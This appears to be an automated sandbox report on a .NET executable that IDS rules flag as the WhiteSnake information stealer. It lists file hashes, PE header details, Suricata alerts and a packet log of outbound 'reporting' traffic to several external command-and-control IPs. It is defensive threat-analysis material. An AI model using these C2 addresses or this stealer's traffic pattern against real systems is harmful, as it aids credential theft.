                                                                                                                                                            SHA512:a11e2b0424d7342bbddc9dd0541902128238281dd9aa620b81213d937a997f9da1c1d3954a05bd57383eb27cd3270d2a29b40a16893237c435fcfdb6344a1746
                                                                                                                                                            SSDEEP:3072:amqroacBJ41WGh6ta9Y9bvxWlI9fKp7KdD+QOi:amwoaCE9Y9bvCQfKkO
                                                                                                                                                            TLSH:0CF3F857F2414FB0D6AE8D76C1B21B3083A09E46CF51BB044A8AF1D52DD36D8EB126F6
                                                                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...X............."...0.............>.... ........@.. ....................................`................................

                                                                                                                                                            File Icon

                                                                                                                                                            Icon Hash:90cececece8e8eb0

                                                                                                                                                            Static PE Info

                                                                                                                                                            General

                                                                                                                                                            Entrypoint:0x42a13e
                                                                                                                                                            Entrypoint Section:.text
                                                                                                                                                            Digitally signed:false
                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                            Subsystem:windows gui
                                                                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                            DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                            Time Stamp:0xE480C158 [Mon Jun 25 20:55:52 2091 UTC]
                                                                                                                                                            TLS Callbacks:
                                                                                                                                                            CLR (.Net) Version:
                                                                                                                                                            OS Version Major:4
                                                                                                                                                            OS Version Minor:0
                                                                                                                                                            File Version Major:4
                                                                                                                                                            File Version Minor:0
                                                                                                                                                            Subsystem Version Major:4
                                                                                                                                                            Subsystem Version Minor:0
                                                                                                                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                                                                            Entrypoint Preview

                                                                                                                                                            Instruction
                                                                                                                                                            jmp dword ptr [00402000h]
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al

                                                                                                                                                            Data Directories

                                                                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x2a0ec0x4f.text
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x2c0000x720.rsrc
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x2e0000xc.reloc
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                            Sections

                                                                                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                            .text0x20000x281440x28200997256af544bc91d3ba8c050998f8a82False0.40083479361370716data5.41759631536855IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                            .rsrc0x2c0000x7200x800b89cb4996239d70ad7d78cd4379f0031False0.43701171875data4.609342591102905IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                            .reloc0x2e0000xc0x2009363c9f9c0a8c7b6c9747b69d0062671False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                            Resources

                                                                                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                            RT_VERSION0x2c0a00x494OpenPGP Secret Key0.48208191126279865
                                                                                                                                                            RT_MANIFEST0x2c5340x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                                                                                                            Imports

                                                                                                                                                            DLLImport
                                                                                                                                                            mscoree.dll_CorExeMain

                                                                                                                                                            Network Behavior

                                                                                                                                                            Suricata IDS Alerts

                                                                                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                            2024-12-08T13:01:57.052726+01002045868ET MALWARE [ANY.RUN] WhiteSnake Stealer Reporting Request (Outbound)1192.168.2.449731209.38.221.1848080TCP
                                                                                                                                                            2024-12-08T13:01:59.080774+01002045868ET MALWARE [ANY.RUN] WhiteSnake Stealer Reporting Request (Outbound)1192.168.2.44973246.235.26.838080TCP
                                                                                                                                                            2024-12-08T13:02:02.956808+01002045868ET MALWARE [ANY.RUN] WhiteSnake Stealer Reporting Request (Outbound)1192.168.2.449733147.28.185.2980TCP
                                                                                                                                                            2024-12-08T13:02:04.960666+01002045868ET MALWARE [ANY.RUN] WhiteSnake Stealer Reporting Request (Outbound)1192.168.2.449734206.166.251.48080TCP
                                                                                                                                                            2024-12-08T13:02:26.972752+01002045868ET MALWARE [ANY.RUN] WhiteSnake Stealer Reporting Request (Outbound)1192.168.2.44974151.159.4.508080TCP

                                                                                                                                                            Network Port Distribution

                                                                                                                                                            TCP Packets

                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                            Dec 8, 2024 13:01:54.553802967 CET4973080192.168.2.4208.95.112.1
                                                                                                                                                            Dec 8, 2024 13:01:54.673333883 CET8049730208.95.112.1192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:01:54.673439026 CET4973080192.168.2.4208.95.112.1
                                                                                                                                                            Dec 8, 2024 13:01:54.690150976 CET4973080192.168.2.4208.95.112.1
                                                                                                                                                            Dec 8, 2024 13:01:54.809536934 CET8049730208.95.112.1192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:01:55.772556067 CET8049730208.95.112.1192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:01:55.813982010 CET4973080192.168.2.4208.95.112.1
                                                                                                                                                            Dec 8, 2024 13:01:56.293328047 CET497318080192.168.2.4209.38.221.184
                                                                                                                                                            Dec 8, 2024 13:01:56.412847042 CET808049731209.38.221.184192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:01:56.413023949 CET497318080192.168.2.4209.38.221.184
                                                                                                                                                            Dec 8, 2024 13:01:56.413141966 CET497318080192.168.2.4209.38.221.184
                                                                                                                                                            Dec 8, 2024 13:01:56.532562971 CET808049731209.38.221.184192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:01:56.768167973 CET497318080192.168.2.4209.38.221.184
                                                                                                                                                            Dec 8, 2024 13:01:56.887819052 CET808049731209.38.221.184192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:01:56.887836933 CET808049731209.38.221.184192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:01:56.887861013 CET808049731209.38.221.184192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:01:56.887877941 CET808049731209.38.221.184192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:01:56.887897968 CET497318080192.168.2.4209.38.221.184
                                                                                                                                                            Dec 8, 2024 13:01:56.887928009 CET497318080192.168.2.4209.38.221.184
                                                                                                                                                            Dec 8, 2024 13:01:56.887933969 CET808049731209.38.221.184192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:01:56.887945890 CET808049731209.38.221.184192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:01:56.887974024 CET497318080192.168.2.4209.38.221.184
                                                                                                                                                            Dec 8, 2024 13:01:56.887989998 CET497318080192.168.2.4209.38.221.184
                                                                                                                                                            Dec 8, 2024 13:01:56.888081074 CET808049731209.38.221.184192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:01:56.888156891 CET497318080192.168.2.4209.38.221.184
                                                                                                                                                            Dec 8, 2024 13:01:56.888195038 CET808049731209.38.221.184192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:01:56.888206005 CET808049731209.38.221.184192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:01:56.888215065 CET808049731209.38.221.184192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:01:56.888303041 CET497318080192.168.2.4209.38.221.184
                                                                                                                                                            Dec 8, 2024 13:01:57.008546114 CET808049731209.38.221.184192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:01:57.008564949 CET808049731209.38.221.184192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:01:57.008585930 CET808049731209.38.221.184192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:01:57.008596897 CET808049731209.38.221.184192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:01:57.008619070 CET808049731209.38.221.184192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:01:57.008668900 CET497318080192.168.2.4209.38.221.184
                                                                                                                                                            Dec 8, 2024 13:01:57.052587032 CET808049731209.38.221.184192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:01:57.052726030 CET497318080192.168.2.4209.38.221.184
                                                                                                                                                            Dec 8, 2024 13:01:57.172133923 CET808049731209.38.221.184192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:01:57.172213078 CET497318080192.168.2.4209.38.221.184
                                                                                                                                                            Dec 8, 2024 13:01:57.212580919 CET808049731209.38.221.184192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:01:57.288539886 CET808049731209.38.221.184192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:01:57.288604975 CET497318080192.168.2.4209.38.221.184
                                                                                                                                                            Dec 8, 2024 13:01:57.332679987 CET808049731209.38.221.184192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:01:57.332735062 CET497318080192.168.2.4209.38.221.184
                                                                                                                                                            Dec 8, 2024 13:01:57.404155970 CET808049731209.38.221.184192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:01:57.404299021 CET497318080192.168.2.4209.38.221.184
                                                                                                                                                            Dec 8, 2024 13:01:57.408021927 CET808049731209.38.221.184192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:01:57.408066034 CET808049731209.38.221.184192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:01:57.452297926 CET808049731209.38.221.184192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:01:57.523972988 CET808049731209.38.221.184192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:01:57.523984909 CET808049731209.38.221.184192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:01:57.524010897 CET808049731209.38.221.184192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:01:57.524022102 CET808049731209.38.221.184192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:01:57.524122000 CET808049731209.38.221.184192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:01:57.524211884 CET808049731209.38.221.184192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:01:57.524241924 CET808049731209.38.221.184192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:01:57.524274111 CET808049731209.38.221.184192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:01:57.524343967 CET808049731209.38.221.184192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:01:57.524354935 CET808049731209.38.221.184192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:01:57.524477959 CET808049731209.38.221.184192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:01:57.524617910 CET808049731209.38.221.184192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:01:57.524705887 CET808049731209.38.221.184192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:01:57.524763107 CET808049731209.38.221.184192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:01:57.524869919 CET808049731209.38.221.184192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:01:57.524909973 CET808049731209.38.221.184192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:01:57.527362108 CET808049731209.38.221.184192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:01:57.568548918 CET808049731209.38.221.184192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:01:57.571578026 CET808049731209.38.221.184192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:01:57.614403963 CET808049731209.38.221.184192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:01:57.643363953 CET808049731209.38.221.184192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:01:57.643457890 CET808049731209.38.221.184192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:01:58.312098026 CET808049731209.38.221.184192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:01:58.312342882 CET808049731209.38.221.184192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:01:58.312407970 CET497318080192.168.2.4209.38.221.184
                                                                                                                                                            Dec 8, 2024 13:01:58.324361086 CET497318080192.168.2.4209.38.221.184
                                                                                                                                                            Dec 8, 2024 13:01:58.330107927 CET497328080192.168.2.446.235.26.83
                                                                                                                                                            Dec 8, 2024 13:01:58.331510067 CET4973080192.168.2.4208.95.112.1
                                                                                                                                                            Dec 8, 2024 13:01:58.445137024 CET808049731209.38.221.184192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:01:58.449811935 CET80804973246.235.26.83192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:01:58.449887037 CET497328080192.168.2.446.235.26.83
                                                                                                                                                            Dec 8, 2024 13:01:58.450089931 CET497328080192.168.2.446.235.26.83
                                                                                                                                                            Dec 8, 2024 13:01:58.451191902 CET8049730208.95.112.1192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:01:58.451338053 CET4973080192.168.2.4208.95.112.1
                                                                                                                                                            Dec 8, 2024 13:01:58.569403887 CET80804973246.235.26.83192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:01:58.798544884 CET497328080192.168.2.446.235.26.83
                                                                                                                                                            Dec 8, 2024 13:01:58.917985916 CET80804973246.235.26.83192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:01:58.918004036 CET80804973246.235.26.83192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:01:58.918059111 CET497328080192.168.2.446.235.26.83
                                                                                                                                                            Dec 8, 2024 13:01:58.918083906 CET497328080192.168.2.446.235.26.83
                                                                                                                                                            Dec 8, 2024 13:01:58.918117046 CET80804973246.235.26.83192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:01:58.918152094 CET80804973246.235.26.83192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:01:58.918164968 CET497328080192.168.2.446.235.26.83
                                                                                                                                                            Dec 8, 2024 13:01:58.918199062 CET497328080192.168.2.446.235.26.83
                                                                                                                                                            Dec 8, 2024 13:01:58.918211937 CET80804973246.235.26.83192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:01:58.918253899 CET80804973246.235.26.83192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:01:58.918262959 CET497328080192.168.2.446.235.26.83
                                                                                                                                                            Dec 8, 2024 13:01:58.918303967 CET497328080192.168.2.446.235.26.83
                                                                                                                                                            Dec 8, 2024 13:01:58.918404102 CET80804973246.235.26.83192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:01:58.918415070 CET80804973246.235.26.83192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:01:58.918448925 CET80804973246.235.26.83192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:01:58.918467999 CET497328080192.168.2.446.235.26.83
                                                                                                                                                            Dec 8, 2024 13:01:58.918498039 CET497328080192.168.2.446.235.26.83
                                                                                                                                                            Dec 8, 2024 13:01:58.918519974 CET80804973246.235.26.83192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:01:58.918598890 CET497328080192.168.2.446.235.26.83
                                                                                                                                                            Dec 8, 2024 13:01:59.037664890 CET80804973246.235.26.83192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:01:59.037674904 CET80804973246.235.26.83192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:01:59.037722111 CET80804973246.235.26.83192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:01:59.037738085 CET80804973246.235.26.83192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:01:59.037782907 CET497328080192.168.2.446.235.26.83
                                                                                                                                                            Dec 8, 2024 13:01:59.037789106 CET80804973246.235.26.83192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:01:59.037839890 CET497328080192.168.2.446.235.26.83
                                                                                                                                                            Dec 8, 2024 13:01:59.080537081 CET80804973246.235.26.83192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:01:59.080774069 CET497328080192.168.2.446.235.26.83
                                                                                                                                                            Dec 8, 2024 13:01:59.200366974 CET80804973246.235.26.83192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:01:59.212204933 CET497328080192.168.2.446.235.26.83
                                                                                                                                                            Dec 8, 2024 13:01:59.240577936 CET80804973246.235.26.83192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:01:59.240634918 CET497328080192.168.2.446.235.26.83
                                                                                                                                                            Dec 8, 2024 13:01:59.331881046 CET80804973246.235.26.83192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:01:59.360198975 CET80804973246.235.26.83192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:01:59.360487938 CET497328080192.168.2.446.235.26.83
                                                                                                                                                            Dec 8, 2024 13:01:59.420558929 CET80804973246.235.26.83192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:01:59.420690060 CET497328080192.168.2.446.235.26.83
                                                                                                                                                            Dec 8, 2024 13:01:59.479835033 CET80804973246.235.26.83192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:01:59.540116072 CET80804973246.235.26.83192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:01:59.540138960 CET80804973246.235.26.83192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:01:59.540240049 CET80804973246.235.26.83192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:01:59.540260077 CET80804973246.235.26.83192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:01:59.540352106 CET80804973246.235.26.83192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:01:59.540412903 CET80804973246.235.26.83192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:01:59.540537119 CET80804973246.235.26.83192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:01:59.540550947 CET80804973246.235.26.83192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:01:59.540585041 CET80804973246.235.26.83192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:01:59.540602922 CET80804973246.235.26.83192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:01:59.540719032 CET80804973246.235.26.83192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:01:59.540730000 CET80804973246.235.26.83192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:01:59.540857077 CET80804973246.235.26.83192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:01:59.540920973 CET80804973246.235.26.83192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:01:59.541007042 CET80804973246.235.26.83192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:01:59.541074991 CET80804973246.235.26.83192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:01:59.541241884 CET80804973246.235.26.83192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:01:59.541347980 CET80804973246.235.26.83192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:01:59.541393995 CET80804973246.235.26.83192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:01:59.541486979 CET80804973246.235.26.83192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:01:59.541524887 CET80804973246.235.26.83192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:01:59.640554905 CET80804973246.235.26.83192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:01:59.659475088 CET80804973246.235.26.83192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:01:59.659528971 CET80804973246.235.26.83192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:01:59.659615993 CET80804973246.235.26.83192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:01:59.659662008 CET80804973246.235.26.83192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:02.196607113 CET80804973246.235.26.83192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:02.196634054 CET80804973246.235.26.83192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:02.196732044 CET497328080192.168.2.446.235.26.83
                                                                                                                                                            Dec 8, 2024 13:02:02.196943998 CET497328080192.168.2.446.235.26.83
                                                                                                                                                            Dec 8, 2024 13:02:02.197566032 CET4973380192.168.2.4147.28.185.29
                                                                                                                                                            Dec 8, 2024 13:02:02.316907883 CET80804973246.235.26.83192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:02.317524910 CET8049733147.28.185.29192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:02.317601919 CET4973380192.168.2.4147.28.185.29
                                                                                                                                                            Dec 8, 2024 13:02:02.317780018 CET4973380192.168.2.4147.28.185.29
                                                                                                                                                            Dec 8, 2024 13:02:02.442015886 CET8049733147.28.185.29192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:02.673619986 CET4973380192.168.2.4147.28.185.29
                                                                                                                                                            Dec 8, 2024 13:02:02.793531895 CET8049733147.28.185.29192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:02.793551922 CET8049733147.28.185.29192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:02.793561935 CET8049733147.28.185.29192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:02.793575048 CET8049733147.28.185.29192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:02.793585062 CET8049733147.28.185.29192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:02.793587923 CET4973380192.168.2.4147.28.185.29
                                                                                                                                                            Dec 8, 2024 13:02:02.793592930 CET8049733147.28.185.29192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:02.793601990 CET8049733147.28.185.29192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:02.793612957 CET8049733147.28.185.29192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:02.793622017 CET8049733147.28.185.29192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:02.793629885 CET8049733147.28.185.29192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:02.793663979 CET4973380192.168.2.4147.28.185.29
                                                                                                                                                            Dec 8, 2024 13:02:02.793690920 CET4973380192.168.2.4147.28.185.29
                                                                                                                                                            Dec 8, 2024 13:02:02.913448095 CET8049733147.28.185.29192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:02.913466930 CET8049733147.28.185.29192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:02.913479090 CET8049733147.28.185.29192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:02.913506985 CET8049733147.28.185.29192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:02.913609028 CET8049733147.28.185.29192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:02.913774967 CET4973380192.168.2.4147.28.185.29
                                                                                                                                                            Dec 8, 2024 13:02:02.956656933 CET8049733147.28.185.29192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:02.956808090 CET4973380192.168.2.4147.28.185.29
                                                                                                                                                            Dec 8, 2024 13:02:03.076311111 CET8049733147.28.185.29192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:03.076611042 CET4973380192.168.2.4147.28.185.29
                                                                                                                                                            Dec 8, 2024 13:02:03.116591930 CET8049733147.28.185.29192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:03.196140051 CET8049733147.28.185.29192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:03.196350098 CET4973380192.168.2.4147.28.185.29
                                                                                                                                                            Dec 8, 2024 13:02:03.240564108 CET8049733147.28.185.29192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:03.300745010 CET8049733147.28.185.29192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:03.300900936 CET4973380192.168.2.4147.28.185.29
                                                                                                                                                            Dec 8, 2024 13:02:03.315716028 CET8049733147.28.185.29192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:03.420469046 CET8049733147.28.185.29192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:03.420488119 CET8049733147.28.185.29192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:03.420562029 CET8049733147.28.185.29192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:03.420572042 CET8049733147.28.185.29192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:03.420666933 CET8049733147.28.185.29192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:03.420679092 CET8049733147.28.185.29192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:03.420802116 CET8049733147.28.185.29192.168.2.4
                                                                                                                                                            Dec 8, 2024 13:02:03.420809984 CET8049733147.28.185.29192.168.2.4
